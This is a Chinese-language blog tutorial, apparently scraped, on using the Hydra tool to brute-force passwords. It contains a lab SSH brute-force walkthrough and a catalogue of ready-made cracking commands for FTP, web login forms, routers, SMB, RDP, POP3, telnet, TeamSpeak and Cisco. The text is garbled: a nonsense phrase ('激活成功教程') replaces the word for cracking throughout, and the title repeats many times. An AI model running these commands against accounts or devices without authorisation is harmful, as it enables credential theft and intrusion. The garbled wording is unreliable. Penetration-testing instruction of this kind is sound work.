【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战

目录

九头蛇hydra

使用方法

案例分析

暴破ssh登录密码

环境介绍

开始爆破

激活成功教程成功

测试登录

各种协议激活成功教程汇总

FTP协议激活成功教程

http协议激活成功教程

https协议激活成功教程

路由器激活成功教程

http-proxy协议激活成功教程

smb激活成功教程

 Windows远程桌面

邮箱pop3

telnet激活成功教程

语音通讯工具teamspeak

cisco


九头蛇hydra

记得美国队长中的大反派hydra(九头蛇)组织吗?

今天介绍的这款渗透测试工具,也叫这个名字。

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

hydra是著名组织thc的一款开源的暴力激活成功教程密码工具,功能非常强大

kali下是默认安装的,几乎支持所有协议的在线激活成功教程。

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

密码能否激活成功教程,在于字典是否强大以及电脑的性能。

我们就介绍下,这个装备怎么用

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

使用方法

语法:Hydra 参数 IP 服务
参数:
-l login 小写,指定用户名进行激活成功教程
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码激活成功教程,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量激活成功教程。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止激活成功教程。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果激活成功教程中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录激活成功教程,直接用 -l就可以,然后剩余时间激活成功教程密码。
4.缺点,如果目标网站登录时候需要验证码就无法激活成功教程。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。

案例分析

暴破ssh登录密码

环境介绍

攻击机:kali
装有hydra工具

靶机:192.168.154.131
安装ssh服务,正常运行

为了测试方便,我们创建两个简单的字典文件,如下:

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

激活成功教程成功

因为字典数量比较少,我们可以轻易的激活成功教程成功,但是实际情况下,我们可能需要很久。

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

测试登录

使用得到的用户名/密码登录服务器,登录成功

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

各种协议激活成功教程汇总

FTP协议激活成功教程

激活成功教程ftp:

hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

http协议激活成功教程

get方式提交,激活成功教程web登录:

hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php

post方式提交,激活成功教程web登录:

hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"


#/index.php …这个是登录的 url
#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始激活成功教程

https协议激活成功教程

激活成功教程https

hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https

路由器激活成功教程

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试激活成功教程的用户名。

# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为激活成功教程方式(协议)

http-proxy协议激活成功教程

激活成功教程http-proxy:

hydra -l admin -P 字典.txt http-proxy://IP地址

smb激活成功教程

激活成功教程smb:

hydra -l 用户名字典 -P 密码字典 IP地址 smb

 Windows远程桌面

激活成功教程rdp(windows远程登录):

hydra ip地址 rdp -l administrator -P 密码字典.txt -V

邮箱pop3

激活成功教程邮箱pop3:

hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3

telnet激活成功教程

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V

语音通讯工具teamspeak

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak

cisco

hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable

 推荐阅读

【资源推荐】

python实战

【pygame开发实战开发30例 完整源码】

【pygame游戏开发专栏,获取完整源码+教程】

CSDN官方学习推荐 ↓ ↓ ↓

  • CSDN出的Python全栈知识图谱,太强了,推荐给大家!

【渗透测试】密码暴力激活成功教程工具——九头蛇(hydra)使用详解及实战[亲测有效]

 

3754997

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/10769.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注